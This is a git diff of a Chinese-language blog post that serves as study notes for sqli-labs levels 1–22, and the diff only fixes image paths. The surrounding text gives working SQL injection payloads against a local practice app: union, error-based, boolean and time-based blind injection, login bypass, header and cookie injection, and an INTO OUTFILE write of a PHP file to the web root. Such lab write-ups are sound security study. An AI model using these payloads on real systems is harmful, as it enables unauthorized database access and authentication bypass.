--- a/_posts/2020-9-15-Mysql注入靶场.md
+++ b/_posts/2020-9-15-Mysql注入靶场.md
@@ -12,17 +12,13 @@ tags:
      - sql注入
 ---
 
-
-
-
-
 # sqli-labs靶场笔记（一）
 
 ## less-1
 
 - 思路：首先输入`id=1`，页面有显示；再次输入`id=2`，页面出现不同的显示，可以考虑使用联合查绚；再次输入`id=1'`，页面报错，经过观察sql语句是单引号闭合；输入`id=1' order by n --+`，当n为4的时候，页面报错，可以知道查询的数据有三列，最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,database(),@@version--+++`得到结果。
 
-- 结果：![sql-01](\img\sql-labs_01.png)
+- 结果：![sql-01](..\img\sql-labs_01.png)
 
 - 代码：
 
@@ -50,7 +46,7 @@ tags:
 
 - 思路：首先输入`id=1`，页面有显示；再次输入`id=2`，页面出现不同的显示，可以考虑使用联合查绚；再次输入`id=1'`，页面报错，经过观察sql语句是数字型输入；输入`id=1 order by n --+`，当n为4的时候，页面报错，可以知道查询的数据有三列，最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-2/?id=-1 union select 1,database(),@@version--+++`得到结果。
 
-- 结果：![sql-02](\img\sql-labs_02.png)
+- 结果：![sql-02](..\img\sql-labs_02.png)
 
 - 代码：
 
@@ -78,7 +74,7 @@ tags:
 
 - 思路：首先输入`id=1`，页面有显示；再次输入`id=2`，页面出现不同的显示，可以考虑使用联合查绚；再次输入`id=1'`，页面报错，经过观察sql语句是字符型`')`闭合方式；输入`id=1') order by n --+`，当n为4的时候，页面报错，可以知道查询的数据有三列，最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-3/?id=-1') union select 1,@@datadir,@@version_compile_os--+`得到结果。
 
-- 结果：![sql-03](\img\sql-labs_03.png)
+- 结果：![sql-03](..\img\sql-labs_03.png)
 
 - 代码：
 
@@ -106,7 +102,7 @@ tags:
 
 - 思路：首先输入`id=1`，页面有显示；再次输入`id=2`，页面出现不同的显示，可以考虑使用联合查绚；再次输入`id=1"`，页面报错，经过观察sql语句是字符型`")`闭合方式；输入`id=1") order by n --+`，当n为4的时候，页面报错，可以知道查询的数据有三列，最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-4/?id=-1") union select 1,@@datadir,@@version_compile_os--+`得到结果。
 
-- 结果：![sql-04](\img\sql-labs_04.png)
+- 结果：![sql-04](..\img\sql-labs_04.png)
 
 - 代码：
 
@@ -135,7 +131,7 @@ tags:
 
 - 思路：首先输入`id=1`和`id=2`，两次输入的显示结果都一样且没有执行结果的回显，说明不可以进行联合查绚，再次输入`id=1'`，出现报错，且可以观察出sql语句是字符型`'`闭合方式，输入`id=1' --+`，成功闭合；最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x5e,@@version,0x5e),1)--+`。
 
-- 结果：![sql-5](\img\sql-labs_05.png)
+- 结果：![sql-5](..\img\sql-labs_05.png)
 
 - 代码：
 
@@ -163,7 +159,7 @@ tags:
 
 - 思路：首先输入`id=1`和`id=2`，两次输入的显示结果都一样且没有执行结果的回显，说明不可以进行联合查绚，再次输入`id=1"`，出现报错，且可以观察出sql语句是字符型`"`闭合方式，输入`id=1" --+`，成功闭合；最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-6/?id=1" and updatexml(1,concat(0x5e,@@version,0x5e),1)--+`。
 
-- 结果：![sql-06](\img\sql-labs_06.png)
+- 结果：![sql-06](..\img\sql-labs_06.png)
 
 - 代码：
 
@@ -192,7 +188,7 @@ tags:
 
 - 思路：首先在`mysql.ini`中添加`secure-file-priv=''`，表示允许mysql可以对OS进行文件操作。输入`id=1`和`id=2`，两次输入的显示结果都一样且没有执行结果的回显，说明不可以进行联合查绚，再次输入`id=1'`，出现报错，再次输入`id = 1'--+`，发现并没有闭合sql语句，尝试输入`id=1'))--+`，发现成功闭合；最后输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-7/?id=-1')) union select 1,"<?php phpinfo();?>",@@version into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\1.php" --+`.
 
-- 结果：![sql-07](\img\sql-labs_07.png)
+- 结果：![sql-07](..\img\sql-labs_07.png)
 
 - 代码：
 
@@ -220,7 +216,7 @@ tags:
 
 - 思路：	首先输入`id =1`和`id =2`，页面显示都一样，再次输入`id =1' and 1=1--+`和`id = 1' and 1=2--+`，页面出现了不同的变化，得出是字符型`'`闭合方式，不可以使用联合查询和报错查询，可以考虑结合burpsuit使用布尔盲注，`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-8/?id=1' and  length(database())>n--+`，n为用户的可控输入点
 
-- 结果：![sql-8](\img\sql-labs_08.png)
+- 结果：![sql-8](..\img\sql-labs_08.png)
 
 - 代码：
 
@@ -247,7 +243,7 @@ tags:
 
 - 思路：输入`id =1' --+`和`id=1'and 1=2--+`页面都显示`You are in.....`，尝试把`'`改成`"`或者考虑数字型的情况下页面都没有发生变化，这个时候可能只有进行时间盲注了，输入`id=1'and sleep(5)--+`，发现页面跳转的时间增加了5秒，可以结合burpsuit进行时间盲注。输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-9?id=1' and if(substr(database(),1,1)='s',sleep(5),1)--+`
 
-- 结果：![sql-09](\img\sql-labs_09.png)
+- 结果：![sql-09](..\img\sql-labs_09.png)
 
 - 代码：
 
@@ -275,7 +271,7 @@ tags:
 
 - 思路：思路：输入`id =1" --+`和`id=1" and 1=2--+`页面都显示`You are in.....`，尝试把`"`改成`'`或者考虑数字型的情况下页面都没有发生变化，这个时候可能只有进行时间盲注了，输入`id=1"and sleep(5)--+`，发现页面跳转的时间增加了5秒，可以结合burpsuit进行时间盲注。输入`http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-10?id=1" and if(substr(version(),1,1)='a',sleep(5),1)--+`
 
-- 结果：![sql-10](\img\sql-labs_10.png)
+- 结果：![sql-10](..\img\sql-labs_10.png)
 
 - 代码：
 
@@ -304,7 +300,7 @@ tags:
 
 - 思路：在post参数中提交`uname=1 or 1=1 # &passwd=&submit=Submit`,出现登陆失败,再次输入`uname=1' or 1=1 --   &passwd=&submit=Submit`，登陆成功，出现用户名和密码。
 
-- 结果：![sql-11](\img\sql-labs_11.png)
+- 结果：![sql-11](..\img\sql-labs_11.png)
 
 - 代码：
 
@@ -335,7 +331,7 @@ tags:
 
 - 思路：首先输入`uname=1' or 1=1 --   &passwd=1111&submit=Submit`,显示登陆失败，再次输入`uname=1" or 1=1 --   &passwd=1111&submit=Submit`，出现报错提示，尝试输入`uname=1") or 1=1 --   &passwd=1111&submit=Submit`,登陆成功，获得用户名密码。
 
-- 结果：![sql-12](\img\sql-labs_12.png)
+- 结果：![sql-12](..\img\sql-labs_12.png)
 
 - 代码：
 
@@ -367,7 +363,7 @@ tags:
 
 - 思路：尝试输入`uname=1") or 1=1 --   &passwd=&submit=Submit`，登陆失败，再次输入`uname=1') or 1=1 --   &passwd=&submit=Submit`，发现登陆成功。
 
-- 结果：![sql-13](\img\sql-labs_13.png)
+- 结果：![sql-13](..\img\sql-labs_13.png)
 
 - 代码：
 
@@ -398,7 +394,7 @@ tags:
 
 - 思路：首先输入`uname=1") or 1=1 --   &passwd=&submit=Submit`,出现报错，根据报错信息再一次输入`uname=1" or 1=1 --   &passwd=&submit=Submit`，登陆成功。
 
-- 结果：![sql-14](\img\sql-labs_14.png)
+- 结果：![sql-14](..\img\sql-labs_14.png)
 
 - 代码：
 
@@ -432,7 +428,7 @@ tags:
 
 - 思路：输入`uname=1" or 1=1 --   &passwd=&submit=Submit`，显示登陆失败，再次输入`uname=1' or 1=1 --   &passwd=&submit=Submit`，显示登陆成功。
 
-- 结果：![sql-15](\img\sql-labs_15.png)
+- 结果：![sql-15](..\img\sql-labs_15.png)
 
 - 代码：
 
@@ -464,7 +460,7 @@ tags:
 
 - 思路：首先输入`uname=1' or 1=1 --   &passwd=&submit=Submit`,显示登陆失败；再次输入`uname=1" or 1=1 --   &passwd=&submit=Submit`，显示登陆失败，再次输入`uname=1") or 1=1 --   &passwd=&submit=Submit`，发现登陆成功。
 
-- 结果：![sql-16](\img\sql-labs_16.png)
+- 结果：![sql-16](..\img\sql-labs_16.png)
 
 - 代码：
 
@@ -499,7 +495,7 @@ tags:
 
 - 思路：尝试输入`uname=admin&passwd=admin'&submit=Submit`，出现报错，可以利用报错点进行注入；输入`uname=admin&passwd=admin' and extractvalue(1,concat(0x5e,@@version_compile_os,0x5e))-- &submit=Submit`，获得所需要的信息。
 
-- 结果：![sql-17](\img\sql-labs_17.png)
+- 结果：![sql-17](..\img\sql-labs_17.png)
 
 - 代码：
 
@@ -566,7 +562,7 @@ tags:
 
 - 思路：输入正确的用户名和密码后成功登陆，然后发现有自己的IP地址和user agent信息显示，考虑是否可以在这些地方进行注入，使用burpsuit抓包，并修改user agent信息为`1'`，出现报错，根据报错信息再次输入`1')--         #`，显示正常，最后输入`'  and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1`，出现结果。
 
-- 结果：![sql-18](\img\sql-labs_18.png)
+- 结果：![sql-18](..\img\sql-labs_18.png)
 
 - 代码：
 
@@ -601,7 +597,7 @@ tags:
 
 - 思路：输入正确的用户名和密码后成功登陆，然后发现有自己的IP地址和referer信息显示，考虑是否可以在这些地方进行注入，使用burpsuit抓包，并修改referer信息为`1'`，出现报错，根据报错信息再次输入`1')--         #`，显示正常，最后输入`1' and updatexml(1,concat(0x5e,@@datadir,0x5e),1) and '1' = '1`，出现结果。
 
-- 结果：![sql-19](\img\sql-labs_19.png)
+- 结果：![sql-19](..\img\sql-labs_19.png)
 
 - 代码：
 
@@ -637,7 +633,7 @@ tags:
 
 - 思路：这一关是cookie注入，首先要输入正确的用户名密码，登录进去；然后抓取有cookie的数据包，对cookie进行修改，尝试输入`uname=admin'`，发现报错，再次输入` uname=admin' and updatexml(1,concat(0x5e,database(),0x5e),1) --   #`,显示出我们想要的数据库名字。
 
-- 结果：![sql-20](\img\sql-labs_20.png)
+- 结果：![sql-20](..\img\sql-labs_20.png)
 
 - 代码：
 
@@ -675,7 +671,7 @@ tags:
 
 - 思路：通过查看cookie,发现进行了base64编码，所以要对payload进行base64编码输入。`uname=YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg1ZSxAQHZlcnNpb24sMHg1ZSksMSkgYW5kICcxJyA9JzE=`，得到mysql的版本信息。
 
-- 结果：![sql-21](\img\sql-labs_21.png)
+- 结果：![sql-21](..\img\sql-labs_21.png)
 
 - 代码：
 
@@ -714,7 +710,7 @@ tags:
 
 - 思路：这一关和上一关都是进行base64编码，只是由`'`变成了`"`，输入`uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg1ZSx1c2VyKCksMHg1ZSksMSktLSAgICM=`，成功出现用户信息。
 
-- 结果：![sql-22](\img\sql-labs_22.png)
+- 结果：![sql-22](..\img\sql-labs_22.png)
 
 - 代码：
 
